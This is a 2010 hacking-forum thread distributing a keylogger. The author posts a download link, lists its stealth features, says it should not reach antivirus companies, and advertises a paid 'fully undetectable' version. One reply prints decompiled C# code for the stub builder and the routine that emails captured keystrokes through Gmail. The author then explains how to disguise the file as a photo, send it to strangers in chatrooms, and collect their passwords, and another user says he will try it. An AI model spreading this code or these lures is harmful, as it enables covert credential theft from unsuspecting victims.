 |
View unanswered posts | View active topics
|
Page 1 of 1
|
[ 10 posts ] |
|
| Author |
Message |
|
bextas
|
Post subject: {New} {Working} Bextas Public keylogger v1.2 [bug fixed] Posted: Wed Jan 27, 2010 1:18 pm |
|
Joined: Sat Aug 15, 2009 7:18 pm Posts: 30
|
Hi guys I've been working on my keylogger and fixing some bugs It is tested and its working screenshot FeaturesAdd to startup using registry Logs sent in every 15 minutes user friendly GUI support Gmail Test e-mail is it valid or no Log open window, which will make logging much easier Hidden really good & invisible Send new logs over and over again your virus Icon as jpeg picture Icon download linkhttp://www.datafilehost.com/download-58bd0464.htmlNoteDon't send this program to Antivirus companies, so that it can be undetectable for long time I am selling a private version of this , (FUD) Fully Undetectable by any antivirus and with many new features and with clear logsPM me if you want to buy it
Last edited by bextas on Wed Feb 03, 2010 8:49 pm, edited 1 time in total.
|
|
| Top |
|
|
Reelix
|
Post subject: Re: {New} {Working} Bextas Public keylogger v1.2 [bug fixed] Posted: Thu Jan 28, 2010 9:01 pm |
|
Joined: Wed Mar 25, 2009 2:56 pm Posts: 123 Location: Alpha Centauri B
|
|
Clean.
Send Test Mail:
private void Button3_Click(object sender, EventArgs e) { MailMessage message = new MailMessage { From = new MailAddress(this.TextBox1.Text) }; message.To.Add(this.TextBox1.Text); message.Subject = MyProject.Computer.Name + ":"; message.Body = "----------This is a test----------"; new SmtpClient("smtp.gmail.com") { Port = 0x24b, EnableSsl = true, Credentials = new NetworkCredential(this.TextBox1.Text, this.TextBox2.Text) }.Send(message); }
Create Stub:
private void Button1_Click(object sender, EventArgs e) { this.text1 = this.TextBox1.Text; this.text2 = this.TextBox2.Text; FileSystem.FileOpen(1, Application.StartupPath + @"\stub1.exe", OpenMode.Binary, OpenAccess.Read, OpenShare.Default, -1); this.stub1 = Strings.Space((int) FileSystem.LOF(1)); FileSystem.FileGet(1, ref this.stub1, -1L, false); FileSystem.FileClose(new int[0]); if (File.Exists(this.TextBox3.Text)) { MyProject.Computer.FileSystem.DeleteFile(this.TextBox3.Text); } FileSystem.FileOpen(1, Application.StartupPath + @"\" + this.TextBox3.Text, OpenMode.Binary, OpenAccess.ReadWrite, OpenShare.Default, -1); FileSystem.FilePut(1, this.stub1 + "@bextas@" + this.text1 + "@bextas@" + this.text2 + "@bextas@", -1L, false); MessageBox.Show(this.TextBox3.Text + " is created", "information", MessageBoxButtons.OK, MessageBoxIcon.Asterisk); }
Keylogger:
private void Timer2_Tick(object sender, EventArgs e) { MailMessage message = new MailMessage { From = new MailAddress(this.TextBox1.Text) }; message.To.Add(this.TextBox1.Text); message.Subject = MyProject.Computer.Name + ":"; message.Body = this.TextBox3.Text; new SmtpClient("smtp.gmail.com") { Port = 0x24b, EnableSsl = true, Credentials = new NetworkCredential(this.TextBox1.Text, this.TextBox2.Text) }.Send(message); this.TextBox3.Clear(); }
|
|
| Top |
|
|
bextas
|
Post subject: Re: {New} {Working} Bextas Public keylogger v1.2 [bug fixed] Posted: Fri Jan 29, 2010 1:08 pm |
|
Joined: Sat Aug 15, 2009 7:18 pm Posts: 30
|
Reelix wrote: Clean.
Send Test Mail:
private void Button3_Click(object sender, EventArgs e) { MailMessage message = new MailMessage { From = new MailAddress(this.TextBox1.Text) }; message.To.Add(this.TextBox1.Text); message.Subject = MyProject.Computer.Name + ":"; message.Body = "----------This is a test----------"; new SmtpClient("smtp.gmail.com") { Port = 0x24b, EnableSsl = true, Credentials = new NetworkCredential(this.TextBox1.Text, this.TextBox2.Text) }.Send(message); }
Create Stub:
private void Button1_Click(object sender, EventArgs e) { this.text1 = this.TextBox1.Text; this.text2 = this.TextBox2.Text; FileSystem.FileOpen(1, Application.StartupPath + @"\stub1.exe", OpenMode.Binary, OpenAccess.Read, OpenShare.Default, -1); this.stub1 = Strings.Space((int) FileSystem.LOF(1)); FileSystem.FileGet(1, ref this.stub1, -1L, false); FileSystem.FileClose(new int[0]); if (File.Exists(this.TextBox3.Text)) { MyProject.Computer.FileSystem.DeleteFile(this.TextBox3.Text); } FileSystem.FileOpen(1, Application.StartupPath + @"\" + this.TextBox3.Text, OpenMode.Binary, OpenAccess.ReadWrite, OpenShare.Default, -1); FileSystem.FilePut(1, this.stub1 + "@bextas@" + this.text1 + "@bextas@" + this.text2 + "@bextas@", -1L, false); MessageBox.Show(this.TextBox3.Text + " is created", "information", MessageBoxButtons.OK, MessageBoxIcon.Asterisk); }
Keylogger:
private void Timer2_Tick(object sender, EventArgs e) { MailMessage message = new MailMessage { From = new MailAddress(this.TextBox1.Text) }; message.To.Add(this.TextBox1.Text); message.Subject = MyProject.Computer.Name + ":"; message.Body = this.TextBox3.Text; new SmtpClient("smtp.gmail.com") { Port = 0x24b, EnableSsl = true, Credentials = new NetworkCredential(this.TextBox1.Text, this.TextBox2.Text) }.Send(message); this.TextBox3.Clear(); } I'm not all you guys thinking, you are like my family, and i won't do anything stupid to my programs, but trust no one  , but i'm not saying you should not trust me, if you want, you can trust me but if you don't then GTFO And i worked hard on this keylogger, to make it work properly and adding some features. And no thanks,no nothing cm on Guys.... 
Last edited by bextas on Fri Jan 29, 2010 8:19 pm, edited 1 time in total.
|
|
| Top |
|
|
Hacker89
|
Post subject: Re: {New} {Working} Bextas Public keylogger v1.2 [bug fixed] Posted: Fri Jan 29, 2010 7:25 pm |
|
Joined: Wed Jun 03, 2009 7:31 pm Posts: 282
|
|
your keylogger is not identified by my vista operating system. Is it not suppose to show as exe? it's format is "file"
|
|
| Top |
|
|
bextas
|
Post subject: Re: {New} {Working} Bextas Public keylogger v1.2 [bug fixed] Posted: Fri Jan 29, 2010 8:14 pm |
|
Joined: Sat Aug 15, 2009 7:18 pm Posts: 30
|
Hacker89 wrote: your keylogger is not identified by my vista operating system. Is it not suppose to show as exe? it's format is "file" drag and drop that file into a winrar then extract keylogger filet to your Desktop or were you can easily find it
|
|
| Top |
|
|
Hacker89
|
Post subject: Re: {New} {Working} Bextas Public keylogger v1.2 [bug fixed] Posted: Sat Jan 30, 2010 11:47 am |
|
Joined: Wed Jun 03, 2009 7:31 pm Posts: 282
|
|
Okay i will do that right away
|
|
| Top |
|
|
Hacker89
|
Post subject: Re: {New} {Working} Bextas Public keylogger v1.2 [bug fixed] Posted: Sat Jan 30, 2010 12:09 pm |
|
Joined: Wed Jun 03, 2009 7:31 pm Posts: 282
|
|
So now i have it but how will i go about setting it up if i want to lock someone's password on their pc and wnat it to be send to my email address
|
|
| Top |
|
|
bextas
|
Post subject: Re: {New} {Working} Bextas Public keylogger v1.2 [bug fixed] Posted: Sat Jan 30, 2010 1:45 pm |
|
Joined: Sat Aug 15, 2009 7:18 pm Posts: 30
|
Hacker89 wrote: So now i have it but how will i go about setting it up if i want to lock someone's password on their pc and wnat it to be send to my email address use your Gmail account and enter your Gmail address and password on keylogger builder then click on build then it will create a server, as a picture Icon, then send it to someone like on online chatrooms or MSN then tell them that it is a picture of your sister  then if they click and run it, it will install itself in background, so they won't notice that they have been keylogged, so after 15 check your emails, then you will get their info. Email subject will be their computer name [Edit] don't click stub, leave it the way it is cheers
|
|
| Top |
|
|
Hacker89
|
Post subject: Re: {New} {Working} Bextas Public keylogger v1.2 [bug fixed] Posted: Sun Jan 31, 2010 9:55 am |
|
Joined: Wed Jun 03, 2009 7:31 pm Posts: 282
|
Lokl  That is a great i dea i should try that out
|
|
| Top |
|
|
bextas
|
Post subject: Re: {New} {Working} Bextas Public keylogger v1.2 [bug fixed] Posted: Mon Feb 01, 2010 5:14 pm |
|
Joined: Sat Aug 15, 2009 7:18 pm Posts: 30
|
Hacker89 wrote: Lokl  That is a great i dea i should try that out lol yea, give it a try
|
|
| Top |
|
|
Page 1 of 1
|
[ 10 posts ] |
|
Who is online |
Users browsing this forum: No registered users and 1 guest |
|
You cannot post new topics in this forum You cannot reply to topics in this forum You cannot edit your posts in this forum You cannot delete your posts in this forum You cannot post attachments in this forum
|
|  |